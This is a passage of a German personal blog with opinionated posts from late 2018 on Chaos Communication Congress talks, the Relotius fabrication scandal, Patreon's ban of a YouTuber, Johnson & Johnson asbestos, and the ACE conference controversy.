Den CCC-Jahresrückblick fand ich dieses Jahr ziemlich langatmig irgendwie, aber das lag wahrscheinlich eher an mir. Das Publikum wirkte zufrieden, insofern will ich nichts gesagt haben. :-)
Der Vortrag über Hausdurchsuchungen war überlaufen, aber diesmal bin ich reingekommen. Der lohnt sich schon aus Neugierde-Gründen, wenn man nicht befürchtet, mal selber betroffen zu sein. Einfach um mal die Mechanik von sowas zu verstehen. Hintergrund des Vortrags waren die (später als unrechtmäßig festgestellten) Hausdurchsuchungen bei den Zwiebelfreunden und im CCC-Umfeld. Meine wichtigste Erkenntnis ist, dass man da zu einem großen Teil von der Rechtstaatlichkeit der durchführenden Beamten abhängig ist. Man hat das Recht, einen Anwalt anzurufen, und auf den sollten die dann warten, und man darf darauf bestehen, dass die nur ein Zimmer zur Zeit durchsuchen, und zwar das, in dem man zuguckt. Aber wenn der Polizist da "nicht gut über die Rechtslage informiert ist", dann kann man das halt nicht unbedingt durchsetzen. Ja super. Als Vorbereitung sollte man off-site Backups haben und die Handynummer (!) eines Anwaltes, den man dann anrufen kann, weil so Durchsuchungen gerne um 4 Uhr morgens stattfinden, und da ist kein Anwalt im Büro.
Weil ich ein paar Mal gefragt wurde: Mein eingereichter Vortrag wäre über TCB-Minimierung gewesen. TCB ist ein Konzept aus den 80ern, als man noch für selbstverständlich hielt, den Betriebssystem-Kernel formal verifizieren zu können. Da fiel dann jemandem auf, dass auch einige Userspace-Prozesse elementar wichtig für die Integrität des Systems sind, nicht nur der Kernel, und den Begriff TCB geprägt: Trusted Computing Base. Das ist der Teil des Systems, dem man vertrauen muss, weil sonst alles verloren ist. Typischerweise ist der Kernel immer TCB, die Hardware sowieso, und sowas wie das Programm mit dem Login-Prompt. Das schöne am TCB-Konzept ist, dass man damit erstmalig eine objektive Metrik hat, um man gerade die Sicherheit verbessert hat. Wenn die TCB kleiner geworden ist, hat man die Sicherheit verbessert. Leider lässt sich das nicht direkt auf moderne Client-Server-Architekturen anwenden, und mein Vortrag hätte meine Arbeit dazu in den letzten Jahren zusammengefasst, wie man das doch anwenden kann, unter welchen Annahmen das geht, und was man überhaupt erreichen kann.

Thu Dec 27 2018

[l] Als nächstes saß ich bei Space Ops 101 drin, das war recht interessant. Wer sich für Weltraum oder Engineering interessiert, für den lohnt das sicher.
Danach bin ich rübergeeilt zum Cyberstalking-Vortrag von Anne Roth, bei dem ich leider den Anfang verpasst habe. Inhaltlich war das eine Anklage an das System, dass es nicht mehr tut, um Frauen vor gewalttätigen Männern zu schützen. Dass es nicht mal Geld für ordentliche Statistiken gibt, die Bundesregierung weiß von nichts, und die Polizei ist überarbeitet und uninteressiert. Fand ich jetzt nicht so weiterführend. Ich war auch ein bisschen enttäuscht von den Statistiken und dem Fokus auf Frauen als Opfer und Männer als Täter. In der Mitte gab es eine Statistik (ich glaube die war von der Uno?), wo Menschen befragt wurden, ob sie betroffen sind, und da waren mit deutlicher Mehrheit Männer in der Überzahl bei Opfern -- außer halt bei Stalking und sexuell motivierten Nachstellungen. Sogar bei "langfristige Nachstellungen" als Kategorie lagen Männer vorne. Und Anne hat das auf den Projektor gelegt und dann daraus gefolgert, dass man ja wohl endlich mal mehr für die Frauen tun müsste. Ich habe ja im Leben gute Erfahrungen dait gemacht, Leute, von denen du Hilfe willst, nicht zu antagonisieren.
Der nächste Vortrag war Hackerethik von Frank, dem ich am Ende mit dem Saalmikro die Frage stellen wollte, wann es mal wieder eine Alternativlos-Folge gibt, aber der olle Feigling hat keine Fragen genommen!1!!
Ich hörte unterdessen Gutes von dem wallet.fail-Vortrag gehört, den guck ich mir dann auf Video an. Und für mich war als nächstes der jährliche Starbug-Biometrie-Zertrümmer-Talk, diesmal über Venenerkennung. Das war bisher das Highlight der Veranstaltung, lasst euch den nicht entgehen!
Ich hatte übrigens einen Vortrag eingereicht, aber der ist nicht angenommen worden. Beim CCC wird das über ein Kommittee ausgewählt, um Vetternwirtschaft auszuschließen. Daher kommen halt manchmal auch echt gute Einreichungen wie dieser von mir unter die Räder. Ich werde mal gucken, ob ich mich noch reinwurmen kann, weil irgendwo anders einer abspricht oder so. Aber ich glaube eher nicht, und ich bin ja in guter Gesellschaft. Mein Kumpel Steini ist auch nicht reingekommen, was eine verdammte Schande ist. Guckt euch seine Vorträge auf früheren Congressen an, wenn ihr mir nicht glaubt!

Wed Dec 19 2018

[l] Das ehemalige Nachrichtenmagazin hat eine Fake-News-Schleuder unter ihren Redakteuren entdeckt. Ausgerechnet jemand, der jahrelang einen tollen Award nach dem nächsten abgesahnt hat. Ich war ja noch nie ein Freund von Awards, insofern überrascht mich das jetzt weniger als andere Leute.
Hier ist ihre Meldung dazu. Ich bin erstaunt, wieviel Schulterklopfen und Betonen ihrer tollen Werte und großartigen Arbeit sie in diesen Artikel stopfen konnten. Und dann die Beschreibung alles so Groschenroman-Style!
An "Jaegers Grenze" wird Relotius scheitern. Es ist der eine gefälschte Text zu viel, weil er diesmal einen Co-Autoren hat, der seinen "Quatsch" nicht mitmacht, der Alarm schlägt und bald Fakten gegen die Fiktionen sammelt.
IST JA GUT! WIR HABEN ES GEHÖRT! Ihr haltet euch für die großartigste Redaktion aller Zeiten und seid noch stolz darauf, dass der nach Jahren aufgeflogen ist, bevor der "Stern" den Scoop bringen konnte.
Ich finde sowas ja echt unerträglich. Und wenn man es schon bringt, dann bei einer besseren Gelegenheit. Wenn man gerade etwas besonders gut gemacht hat.
Andererseits ... so lange konnten die vielleicht nicht warten. Die Verkaufszahlen gehen ja auch nicht gerade nach oben.
Mal gucken, ob jetzt die Fake-News-Vorwürfe gegenüber anderen ein bisschen weniger penetrant werden.
Update: Bei allem Gemecker möchte ich eine Sache doch lobend erwähnen. Die haben die Artikel von dem Typen mit einem Hinweis versehen und online gelassen. Die falsche Reaktion wäre gewesen, was andere "Presseorgane" tun, und das einfach alles weglöschen, als wäre es nie geschehen. Das ist genau so verlogen wie wenn Geheimdienste Akten über die eigenen Vergehen vernichten. Das machen es nicht besser, nur noch schlimmer.
[l] Bei Patreon knarzt es im gerade Gebälk. Es gibt einen Youtuber namens "Sargon of Akkad", der mit so ~800k Followern relativ weit oben mitspielt. Der kommt so aus der Gamergate-Memelord-Ecke, ist jedenfalls mit Gamergate groß geworden. Der publiziert auf Youtube lauter Videos, in denen er Feminismus, Identity Politics und Deplatforming kritisiert. Der ist aber Equal Opportunity Arschloch und klotzt auch gerne und häufig gegen 4chan und die Alt Right, und eines Tages haben die 4chan-Anons beschlossen, dass der weg muss, und haben eine systematische Aktion gegen ihn gestartet. Sie haben inkriminierendes Material gesammelt und sind damit rumgelaufen und haben Deplatforming gegen ihn gemacht. Das war nicht sonderlich erfolgreich, bis jetzt Patreon den runtergeschmissen hat. Und bei Patreon ist der eine der größten Nummern gewesen.
Ich empfehle den hier nicht, und seine Videos schon gar nicht. Langatmiges endloses Rumgerante um des Rechthabens wegen. Kaum auszuhalten.
Hier ist Sargons Video zu der Nummer.
Ich berichte das, weil Patreon sich da jetzt einer Welle von Kritik gegenübersieht. Und zwar nicht nur von Gamergatern. Von so Leuten wie Sam Harris und Dave Rubin und Jordan Peterson. Das sind so einige der wichtigsten Creators bei Patreon. Rubin und Peterson sagen durch die Blume an, dass die Alternativen auch nicht besser aussehen, und sie mal gucken wollen, ob sie nicht einen Konkurrenzdienst aufmachen.
Patreon sah sich derweit zu einer PR-Schadenskontrolle genötigt, die unfreiwillig komisch ist, weil sie da im Wesentlichen ein Transkript des beanstandeten Video-Segments bringen, aber die bösen Wörter alle wegzensiert haben. Und in den Kernpunkten widerspricht die PR nicht Sargons Darstellung. Das war nicht auf Sargons Youtube-Kanal, und es war nicht über Patreon finanziert. Patreon findet, dass sie trotzdem zuständig sind.
In Sargons Video erzählt er, dass er das vor 10 Monaten gesagt hat, in einem belanglosen Randgruppen-Youtubekanal mit 4k Zuschauern. Dass Patreon da überhaupt von erfahren hat, liegt daran, dass die 4chan-Leute da nach gesucht und ihn angeschwärzt haben.
Patreon ist da natürlich in einer beschissenen Lage. Sie können entweder von der einen Seite der Zensur bezichtigt werden, oder von der anderen Seite der Handlangerei für Nazis/Kriminelle/Monster.
Ich erzähle das alles, weil a) Alternativlos auch per Patreon Spenden annimmt (wo wir hingeflohen waren, weil Flattr stank), und b) inzwischen gefühlt jeder einzelne fucking Youtuber neben Subscribe, Facebook-Like und Twitter-Follow auch zur Patreon-Spende aufruft. Die sind ein wichtiger Teil der Onlinewelt. Für mich riecht es gerade ein bisschen danach, als könnten die an dieser Sargon-Nummer eingehen.

Tue Dec 18 2018

[l] Gaby Weber hat einen neuen Film gemacht, über die israelische Atombombe.

Fri Dec 14 2018

[l] Johnson & Johnson hat Jahrzehntelang Asbest in ihrem Babypuder verkauft. Nicht weil sie das da bösartig reingetan hätten, und auch nicht in großen Mengen, aber es braucht halt keine großen Mengen, um Menschen krank zu machen.
Besonders krass: Es gab schon Ende der 90er Gerichtsverfahren deshalb, und da haben die einfach einen auf dicke Hose gemacht, und der Richter hat sie dann nicht gezwungen, ihre Akten offenzulegen. Die haben einfach gelogen und sind damit durchgekommen.
Erst in späteren Verfahren hat dann das Gericht Einblick in die Akten erzwungen und da kam dann die ganze Chose ans Licht.

Tue Dec 11 2018

[l] Facebook hat ja kürzlich den Algorithmus umgestellt, so dass mehr lokale Meldungen Aufmerksamkeit kriegen.
Dann kam die Gelbjacken-Bewegung in Frankreich, und es sieht aus, als wenn das von Facebooks Algorithmus erst möglich gemacht wurde.
Heute sehe ich in der Süddeutschen einen Kommentar in die Richtung, da könne man mal sehen, wie gefährlich Experimente von Tech-Firmen für die Demokratie seien. Das finde ich ziemlich schockierend. Seht das mal aus der anderen Richtung! Dieses revolutionäre Potential war die ganze Zeit da, aber Facebooks Einlull-Entertainment-Werbeberiesel-Algorithmus hat dafür gesorgt, dass die sich gegenseitig nicht wahrgenommen haben. Wer weiß, mit wieviel anderen Bewegungen das auch so läuft?
Macht das eine Bewegung illegitim, wenn sie "nur dank Facebook" stattfindet? In Ägypten haben wir das damals anders gesehen!
Ich finde das ja die viel bedrohlichere Vorstellung, dass wir auf einem Pulverfass sitzen, und das explodiert bloß nicht, weil die Leute alle ihre Zeit auf Twitter mit dem Blocken von Andersdenkenden ihre Zeit verplempern. In den USA kommt noch dazu, dass die Leute alle von Opiaten sediert werden, aber ist es wirklich so ein Unterschied, wenn die Leute von Internet und TV sediert werden als von Opiaten?

Wed Dec 5 2018

[l] Lacher des Tags (not the Onion!):
Chaos at conservative think tank after donor revealed as Russian ‘oligarch’
Der Lacher ist, dass es sich bei dem Think Tank ausgerechnet um das Hudson Institut handelt, die eine "Kleptocracy Initiative" betreiben, die sich gerade gegen Kleptokraten richten soll. Entsprechend ungehalten war deren Gründer, der das anscheinend echt aus ideologischen Gründen gemacht hat:
Charles Davidson — the founder of the Hudson Institute’s Kleptocracy Initiative, a group dedicated to exposing threats by authoritarian regimes to US democracy — said he quit as its executive director upon learning that the Hudson Institute had accepted a $50,000 donation from Blavatnik.
LMAO!
[l] Also so langsam kann ich mich des Eindrucks nicht erwehren, dass neue Gesetze absichtlich so ausgelegt werden, dass sie maximales Abmahnpotential und das Gegenteil von Datensparsamkeit herbeiführen. Aktuell: Das Verpackungsgesetz.
Die Marktteilnehmer sollen – so heißt es im Gesetz – „vor unlauterem Wettbewerb“ geschützt werden. Dafür wurde eigens eine Zentrale Stelle Verpackungsregister geschaffen, bei der sich alle Betroffenen registrieren müssen.
Mehr Datenbanken? Check!
Wer nicht in dem Register steht, kann also leicht abgemahnt werden. Außerdem droht der Gesetzgeber bei Ordnungswidrigkeiten mit Geldbußen von bis zu 200.000 Euro.
Die Webseite handelt von selbstpublizierten Büchern, aber ich stelle mir gerade mal so einen Wochenmarkt vor, oder eine Bäckerei oder Schlachterei, die nicht Teil einer monströsen Kette ist. Die stehen doch alle mit einem Bein in der Insolvenz dann?

Sun Dec 2 2018

[l] Ich bin ehrlich gesagt ziemlich erschüttert, dass ich jetzt ernsthaft Leserbriefe kriege, Aktien seien ja im Moment eine gute / die einzige gute Altersvorsorge und der Vorschlag von dem Merz würde ja den Leuten bei der Altersvorsorge helfen.
Alter Schwede ey! WARUM sind denn Aktien im Moment die letzte Altersvorsorge, an die ihr noch glaubt? Weil Neocons die der Merz und der Schröder die staatliche Versorgung kaputtgemacht haben! Und dann die Zinsen auf unter Inflationsrate gesetzt haben!
Und denkt mal bitte ernsthaft darüber nach, was das bedeutet, wenn ihr mir erzählt, eine "Anlage", bei der man weniger rauskriegen kann, als man eingezahlt hat, ist die einzige gute Altersvorsorge. Merkt ihr nicht selber, wie ihr euch gerade zum Stück Brot macht?! Ja tragt euer Geld doch gleich ins Casino!
Update: Vielleicht reagiere ich auch bloß so negativ, weil ich beobachtet habe, wie die Republikaner in den USA immer "big government" bekämpfen. Das sieht nämlich genau so aus. Erst behaupten, der Staat sei ineffizient (tatsächlich ist Privatwirtschaft ineffizienter), und der Markt regele das besser, dann Programme kürzen oder ganz streichen, dann die daraus resultierenden Leistungssenkungen als Beweis dafür vorweisen, dass man sowas lieber der Privatwirtschaft überlassen solle, weil der Staat es nicht hinkriege. Wenn kürzen oder streichen nicht geht oder nicht reicht, dann schlägt man Steuerermäßigungen vor. Das kommt aufs Gleiche raus. Der Staat kann sich die Programme dann nicht mehr leisten. Ein toller Win für die Abzocker, ein gewaltiger Verlust für die Bevölkerung.

Thu Nov 29 2018

[l] Wenn ich schon gerade am Herumschwadronieren bin, kann ich ja auch kurz erklären, was ich mit "kategorisch besser" meine.
Ich versuche mich ja immer Ideen anzunähern, die ich nicht teile und die ich nicht voll verstanden habe. Ich versuche sie zu leben. Zu gucken, ob und wo das zu Widersprüchen führt.
Wieviel Bewegung meines Weltbildes wirklich nötig wäre, damit ich die Idee teilen könnte.
Eine der Ideen, die ich seit einer Weile so ausprobiere, ist der Sozialkonstruktivismus. Ich habe das wie gesagt noch nicht voll verstanden, sonst müsste ich das ja hier gerade nicht machen, aber ich verstehe das als Gegenthese zur "natürlichen Ordnung", zur "göttlichen Schöpfung". Was, wenn wir uns das alles nur ausgedacht haben. Wenn es alles bloß verschiedene Perspektiven sind. Was, wenn man nicht daran glaubt, dass die Evolution grundsätzlich gute oder erfolgreiche oder sinnvolle Dinge produziert, sondern eine Tradition auch einfach etwas sein kann, was sich irgendein Fuzzy halt irgendwann aus dem Arsch gezogen hat, und wir fahren da nicht drauf ab, weil das gut ist, sondern wir haben uns da bloß dran gewöhnt. Die Argumente, die wir dafür gefunden haben, die sind eigentlich total schwach, aber wir merken es nicht, weil man uns eh nicht überzeugen muss, wir sind ja schon überzeugt. Weil wir eh schon an die Tradition geglaubt haben und an sie gewöhnt waren. Das senkt die Schwelle für überzeugende Argumente drastisch!
Das 3. Reich führt dann bei mir zu so Gedankengängen wie: Fast alle haben mitgemacht. Das heißt: "Ist Mehrheitsmeinung" ist kein Argument für oder gegen irgendwas.
Und das heißt eben auch, dass das Bewerten der Welt viel schwieriger wird. Ich versuche ja, verschiedene Positionen als gleichwertig anzusehen, auch wenn ich sie nicht teile oder sogar verabscheue. Außer ich finde echte Argumente, wie das konkret schadet. Dann nicht. Aber erstens muss das konkreter Schaden und nicht Konjunktiv sein. Und zweitens ist ein schwarfes Schwert, das trifft dann auch diverse Dinge von "meiner Seite".
Daher bin ich dazu übergegangen, Leute und Gruppen nicht nach ihren Ideen zu bewerten, sondern nach ihren Methoden. Nationalismus z.B. ist dann plötzlich nicht mehr per se böse. Wenn jemand im Namen des Nationalismus Kinder an der Grenze von ihren Eltern trennt, ist das natürlich immer noch böse. Aber das ist ja nicht die Idee, das ist die Methode, die Umsetzung.
Und das meine ich mit kategorisch besser. Nur weil ich mir gerade echt sicher bin, dass diese eine Sache wahr oder gut ist, die ich schon immer für wahr oder gut hielt, heißt eben überhaupt nicht, dass die wirklich wahr oder gut ist. In den meisten Fällen kann das gar nicht beurteilen, ob etwas wahr oder gut ist. Was ich aber auf jeden Fall beurteilen kann, ist ob eine Methode gut ist. Eine Handlung.
Das ist der Grund, wieso ich so ein Problem mit Antifa und linken Internet-Prangern habe. Was wenn wir Unrecht hatten? Wir merken in zehn Jahren, dass Kapitalismus und Nationalismus doch die Antwort sind. Halte ich für sehr unwahrscheinlich, aber kann ich nicht ausschließen. Dann will ich nicht einer von denen gewesen sein, die zur Kapitalismusbekämpfung Waterboarding gemacht haben. Oder generell Gewalt ausgeübt. Das soll jetzt nicht heißen, dass die Antifa waterboarding macht. Jedenfalls nicht dass ich wüsste. Bloß eine Illustration. :-)
Mein größtes aktuelles Problem ist der Klimawandel. Da stoße ich auf einen Widerspruch. Ich bin mir sicher, dass der Klimawandel stattfindet und menschengemacht ist. Aber ich könnte mich irren. Laut obiger Überlegungen müsste ich Leute machen lassen, die Kohle verbrennen, weil ich mir nicht wirklich sicher bin. Aber da fange ich dann an, potentielle Risiken gegeneinander aufzuwägen. Das fühlt sich wie ein Widerspruch an. Eine Auflösung habe ich nicht.
Aber den Anspruch, dass meine Seite sich in ihren Methoden kategorisch von der anderen Seite unterscheiden muss, daran halte ich fest. Das ist mir wichtig.
Viele andere Leute haben aufgegeben, Methoden zu bewerten. Der Zweck heiligt die Mittel. Die beschränken sich dann darauf, anderen Inkonsistenzen nachzuweisen. Davon halte ich nichts. Inkonsistenzen sind gut. Die zeigen, dass jemand seine Meinung ändern kann, wenn ihm andere Fakten bekannt werden.
Oder die erzählen sich im Kreis, wie verderbt die andere Seite ist. Das ist aus meiner Sicht ein Bonding-Ritual und hat nichts mit Argumenten oder Wahrheitsfindung zu tun. Wir hier sind eh schon überzeugt, dass die da drüber schlechter als wir hier sind. Sonst wären wir da drüben bei denen und nicht hier.
Ich finde das auch gut, wenn Niggemeier Rechten Lügen nachweist. Aber dann bitte auch bei uns. Sonst ist das kein Argument sondern Agitation. Den Rechten kann ich ihre Lügen und Verdrehungen nur vorwerfen, wenn wir nicht lügen und verdrehen. Und wir lügen und verdrehen aus meiner Sicht auch die ganze Zeit. Aber keiner sagt was, weil das ja unsere Seite ist. Eine Lüge für die gute Sache ist immer noch eine Lüge. Und die Rechten lügen auch für die gute Sache. Das könnt ihr mir glauben. Die sind überzeugt davon, dass sie für die gute Sache kämpfen.

Tue Nov 27 2018

[l] Leserbrief zur BaFin:
....hast Du den Bankern auch mal was von BlackRock & "ALADDIN" erzählt?
Ist ja nicht so, dass es nicht Systeme gibt, die mit "BigData" nicht "BigBusiness" machen.
In diesem Falle "the biggest business in the world".
Mittlerweile erledigt Aladdin (also eine closed-source Fremdsoftware!) auch die Risiko- und Beeinflussungsanalysen für fast alle bedeutenden "Konkurrenz"-Banken, klar, als Mehrheitsaktionär hat Blackrock so seine Mittel, für Unternehmensstiftungen, Staatsfonds, Versicherungen, Pensionskassen und: FED und die EZB! Gleichzeitig ist Blackrock Miteigentümer der "Rating-Agenturen" - ein geschlossenes "Wertschöpfungssystem".
Die BaFin als nationale Instanz scheint komplett hilflos, unterbesetzt und unterfinanziert. (Ja, deren Mini-Strafe an Blackrock ist mir bekannt, immerhin...)
Also, ein wenige Technologie-Know-How könnte denen gar nicht schaden, oder?
Fefe, übernehmen Sie! ;=)
Ich finde nicht, dass das eine Technologie-Frage ist. Es ist ja völlig egal, mit welcher Technologie die das machen. Ob da jetzt alte Damen den Kaffeesatz befragen oder eine "proprietäre KI" Dinge tut – das ist doch völlig intransparent und nicht nachvollziehbar.
Die Argumente dagegen sind auch nicht "das ist Hype-Bullshit, das funktioniert nicht" sondern "ihr habt euch so von denen abhängig gemacht, dass die jetzt sonstwas mit euch tun könnten".
Aber die Frage, ob man aus dem Hype-Vortrag vielleicht eine größere Webseite machen sollte, die dann auch googelbar wäre, stellt sich in der Tat.

Mon Nov 26 2018

[l] Habt ihr euch auch gefragt, wieso es bei uns im Sommer nicht mehr regnet? Die ARD hat dazu mal ein Erklärvideo gemacht.

Fri Nov 23 2018

[l] Die Humboldt-Uni reiht sich jetzt auch endlich in die ewigen Urheberrechtsverschärfer ein. Ein starker Urheberrechtsschutz sei essentielle Voraussetzung für freie finanzierbare Presse und Demokratie.
Leider steht nicht dran, wer die Lehrstühle sponsort.
Tja, wie es so schön heißt: Pecunia non olet.
Update: Mit Geld der VG Media, erzählt mir gerade eine gewöhnlich gut unterrichtete Quelle.
Update: Hier gibt es eine Pressemitteilung. Money Quote:
Förderer des Instituts sind unter anderem:
Handelsblatt, Klassik Radio, CNN, ANTENNE BAYERN, WELT, General-Anzeiger, Berliner Morgenpost, radio ffn, WESTFALEN BLATT, Bloomberg, Sat.1, HIT RADIO FFH, Aachener Nachrichten, RTL, Augsburger Allgemeine, Berliner Rundfunk 91.4, VOX, sh:z, Kölner Stadt-Anzeiger, ProSieben, Märkische Allgemeine Zeitung, ROCK ANTENNE, Antenne Niedersachsen, N24 Doku, Evangelische Zeitung, SPORT1, ANTENNE THÜRINGEN, RTL RADIO, Der Westen, Berliner Zeitung, VIVA / COMEDY CENTRAL, 98.8 KISS FM, General-Anzeiger Bonn, HÖRZU, Wolfsburger Nachrichten, Eurosport, Westfälische Nachrichten, Musikexpress, Südkurier, RHH-Radio Hamburg, Aachener Zeitung, kabel eins, SportBild, DIE WELT, R.SH Radio Schleswig-Holstein, Göttinger Tageblatt, Lübecker Nachrichten, 98.2 RADIO PARADISO, RollingStone, BZ, radio SAW, Thüringer Allgemeine, Radio Cottbus, Solinger Tageblatt, Pfälzischer Merkur, BILD, ANTENNE MV, STAR FM Berlin, Hamburger Morgenpost, 104.6 RTL Radio, Wolfsburger Allgemeine Zeitung, COMPUTER BILD, n.tv, RADIO REGENBOGEN, Schwäbische Zeitung, TELE 5, Berliner Rundfunk 91.4, Energy, OSTSEE-ZEITUNG sowie VAUNET, VG Media und BDZV.
Na da bleiben ja wohl keine Fragen offen.
Beachtet auch den komplett männlichen wissenschaftlichen Beirat:
Dem Beirat gehören an: Prof. Dr. Karl-Heinz Fezer, Prof. em. Dr. Dr. h.c. Dieter Grimm, LL.M., Michael Hanfeld, Dr. Stefan Heck, LL.M., Prof. Dr. Jan Hegemann, Christoph Keese, Prof. Dr. Diethelm Klippel, Prof. Dr. Oliver Lepsius, LL.M., Prof. Dr. Michael Pauen, Markus Runde, M.C.J., Dr. Jan Nicolaus Ullrich, LL.M.
War die HU nicht die Uni mit dem Gender-Fokus? Die Woke-Uni? Ja wie konnte denn DAS passieren?!
Christoph Keese ist der Mann beim Springer-Verlag, der das Leistungsschutzrecht herbeilobbyiert hat.

Tue Nov 20 2018

[l] Wer Fefe nachmacht oder nachgemachten Fefe in Umlauf bringt, wird … wegen Bandenkriminalität verhaftet.

Fri Nov 16 2018

[l] Ein Leser hat mir einen langen Leserbrief mit Hintergründen zur ACE-Konferenz geschickt, die das ganze in einem anderen Licht erscheinen lassen. Hier ist er:
zu der ACE-Geschichte noch ein paar Hintergruende:
1. Der Organizer, Adrian Cheok, hat letztes Jahr auf der Foundations of Digital Games einen Vortrag gehalten, der auf der Konferenz und auf Twitter (relativ) sachlich kritisiert wurde. Die Kritik war definitiv links angehaucht, und das Thema "Love and sex with robots" ist wohl von Natur aus etwas kontroversiell, aber bei so einem Thema kann man damit rechnen, dass nicht alle auf einer Linie sein werden. Er ist daraufhin ziemlich entgleist und hat die Kritiker, und in weiterer Folge auch FDG persoenlich angegriffen (sowas wie "Even a 10 year old could understand my talk. SAD and DUMB!"). FDG hat sich dann von seiner Position distanziert und das war (soweit ich das mitbekommen habe) alles, was die Konferenz mit ihm zu tun hatte (und jetzt sind sie auf seiner naughty-list, obwohl sie mit der ACE Geschichte nix zu tun hatten). [1, 2]
2. Das ACE steering committee hat dann, mit Cheok gemeinsam, beschlossen, dass es fuer das Image von ACE besser waere, wenn er zuruecktritt, und jemand anderes die Konferenz organisiert. Das hat er dann aber nicht gemacht, worauf der Rest des Steering Committees zurueckgetreten ist (das war im Fruehjahr dieses Jahres). Ausserdem haben einige von den Leuten, die als Reviewer auf der Website gestanden sind, gar nicht davon gewusst. Daraufhin hat es dann mal Fragen darueber gegeben, ob da ueberhaupt ordentlich reviewt wird. [3] Der Publisher hat dann auch irgendwann gemeint, sie koennen ordentliche reviews nicht garantieren, deshalb werden die proceedings nicht publiziert.
3. Als neues Steering Committee Mitglied ist dann David Levy ernannt worden, der gerade in einen lawsuit verstrickt ist, weil er beschuldigt wird mit einer indiegogo Kampagne 500 000 GBP verdient zu haben ohne jemals was zu liefern/produzieren [4]. Gibt einige Leute, die darueber ziemlich veraergert sind, und alle (soweit ich das sehen kann) von den persoenlichen Angriffen gegen Levy kamen von einem einzigen Twitter account, der quasi ausschliesslich ueber diese indiegogo Geschichte wettert, und dann halt fuer mehr visibility auch den #boycottACE Hashtag zu verwenden begonnen hat [5]
Die ganze Konferenz war also schon eine shitshow bevor Bannon auch nur angekuendigt war. Ich war letztes Jahr auf der FDG und hab den Talk gesehen, und ganz abgesehen vom Inhalt war Cheok's Einstellung und Reaktion auf Kritik halt akademisch untragbar (fuer offene Kritik haben wir ja den Diskurs auf Konferenzen). Muss auch sagen, dass Bannon mit einer pro-Nationalism Rede auf einer Games Konferenz doch eher deplaziert wirkt, und dann geht da halt keiner hin. Das "Schlaue", das Cheok gemacht hat, war fuer Leute in Montana $0 keynote-only tickets anzubieten (Fuer die volle Konferenz ist die Registration ueber $800), dh die academics waeren nicht hingegangen, und haetten mit ihrer Registration fee einen Bannon-Rally fuer die Leute von Montana finanziert, und *das* ist halt ziemlich questionable. (Abgesehen davon find ich die Idee mit $0 keynote-only tickets fuer Konferenzen aber grossartig, wenn die keynote fuer die zahlenden Teilnehmer auch relevant ist).
Will dir aber gar nicht abstreiten, dass die Kontroverse groesser war, als notwendig gewesen waere (die Konferenz waere anscheinend auch ganz von selbst gestorben, ohne ernsthafte reviews und mit den ganzen Ruecktritten). Ganz so ein Opfer, wie er sich selbst darstellt, ist Cheok aber auch nicht.
Ein anderer Leser hat diesen Link dazu geschickt, der in eine ähnliche Richtung geht.

Thu Nov 15 2018

[l] Neulich so: Boykottiert ACE!1!!
Jetzt so:
In a tragic moment in the history of human civilization, and the trampling of academic free speech, an academic conference, ACE 2018, The 15th International Conference on Advances in Computer Entertainment Technology, which was to have been held at the University of Montana, USA has been forced to shut down by anti-free speech groups comprising of mainly academic researchers, who have been acting in a fascistic manner.
Aber nicht doch, mein Herr! Das ist nicht Faschismus, wenn man sagt, es diene der Faschismusbekämpfung!
Ich warte ja darauf, dass der Trump das kapiert, und seine Familientrennungen an der Grenze mit Faschismusbekämpfung begründet.
Ach komm, Fefe, du wirst doch nicht Leute, die Steve Bannon einladen, als Opfer darstellen wollen, wenn das ganz klar die Täter hier sind!1!! Naja, äh, …
The words that were used in their email and social postings about ACE Committee members and the ACE 2018 Keynote Speaker include “sicko”, “child-abuser”, “TOOL”, “Peadophiles”, “child-rapist”, “fraudster”, “scammers”, “criminals”, “horseshit”, “monkey”, “prick”, “Nigerian 419 scammer”, “druf trafficker”, “pig”, “twat”, “scumbag”, “6mm nano penis”, “conman”, “fraudster”, “monster”, “creepy”, “hag”, “criminal”, etc. There were also significant racist attacks on our esteemed committee member Prince Akinwale Ojomo (a highly qualified World Economic Forum Global Leader and awardee of the highly prestigious US President’s Volunteer Service Gold Award), simply because he is African and Nigerian. These anti-free speech people were supported in public statements by the academic societies British DiGRA and DiGRA Australia and the FDG (Foundations of Digital Games) Conference.
Da weiß man doch, was man hat! Rassismus ist nämlich auch kein Rassismus, müsst ihr wissen, wenn es von Leuten gemacht wird, die bloß den Faschismus bekämpfen wollten!1!!
Ich hatte gehofft, dieses Mal können wir Schlimmeres verhindern, bevor Bücher verbrannt werden.
Update: Es gibt inzwischen mehrere Reaktionen auf den Text, die ich sehr spannend finde. Die ignorieren nämlich rundheraus den Rassismus sondern machen sich über ... festhalten! ... das "Opfer-Getue" lustig. Dieser Konferenz-Veranstalter jetzt. Denn das sind ja Nazis, daher steht denen kein Opferstatus zu. Dieselben Leute, die ansonsten ganztägig damit beschäftigt sind, auf der Linken Opferrollen zu verteilen und sich gegenseitig zu bestätigen, wie marginalisiert sie doch seien, die finden das jetzt unerträglich, wenn diese Konferenz-Veranstalter sich in ihrer angenommenen Opferrolle suhlen.
Ich für meinen Teil halte Opferrollen immer für schädlich, egal von wem und warum, und auch egal ob das inhaltlich begründet ist oder nicht. Typische Folgen von Opferrollen sind:
1. „DARAN liegt das, wenn ich etwas nicht schaffe!“
2. „Andere sind Schuld, also müssen auch die sich ändern, damit es besser wird. Ich kann nichts machen.“
3. Und damit ist dann praktisch garantiert, dass alles schlecht bleibt.
Wieso solltest du zukünftig Arbeit investieren, um irgendwas zu verbessern, wenn sich eh die Welt gegen dich verschworen hat und du marginalisiert und von bösen Mächten am Erfolg gehindert wirst?
Daher ist meine Perspektive in der Sache auch, wie so häufig, nicht "schaut her, wie diese Leute unterdrückt werden", sondern die Doppelzüngigkeit und Doppelstandards der Linken. Es ist wirklich schade, dass die Linken immer und immer wieder keine Chance auslassen, geradezu Umwege in Kauf nehmen, um den Rechten ihre Bullshit-Argumente und -Darstellungen auch noch zu bestätigen.

Wed Nov 14 2018

[l] Manche Schlagzeilen sind wie gemacht für dieses Blog: Autofahrer auf der Autobahn mit Mettbrötchen attackiert :-)
Auf der A 48 bei Koblenz ist es zu einem ungewöhnlichen Vorfall gekommen. Ein Autofahrer wurde vom Beifahrer eines anderen Wagens mit einem Mettbrötchen beworfen. Eine entscheidende Frage ist laut Polizei noch offen.
Oh? Die entscheidende Frage ist noch offen?! Welche ist denn das?
„Ob auch Zwiebeln dabei waren, konnte nicht mehr festgestellt werden“, gab die Polizei weiterhin bekannt.
(Danke, Thomas)

Tue Nov 13 2018

